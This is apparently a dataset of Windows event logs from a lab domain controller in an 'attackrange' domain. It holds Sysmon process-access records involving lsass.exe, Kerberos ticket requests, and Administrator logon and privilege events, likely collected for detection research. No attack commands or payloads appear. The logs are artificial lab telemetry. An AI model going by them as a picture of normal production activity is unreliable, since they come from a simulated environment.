{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2514,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.907\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-001027660400}\r\nTargetProcessId: 4212\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.907","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-001027660400}","TargetProcessId":"4212","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76839,"ProcessID":856,"ThreadID":920,"Channel":"System","Message":"The NetSetupSvc service entered the running state.","param1":"NetSetupSvc","param2":"running","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220344,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x46920\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x46920","LogonType":"3","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2515,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.126\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.126","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220345,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220346,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{E50135F7-BF80-2E10-0465-5DE964C29E4C}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{E50135F7-BF80-2E10-0465-5DE964C29E4C}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220347,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{E50135F7-BF80-2E10-0465-5DE964C29E4C}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{E50135F7-BF80-2E10-0465-5DE964C29E4C}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220348,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x47C52\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{E50135F7-BF80-2E10-0465-5DE964C29E4C}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x47c52","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{E50135F7-BF80-2E10-0465-5DE964C29E4C}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220349,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x47C52\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x47c52","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2516,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.141\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.141","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2517,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.141\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.141","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
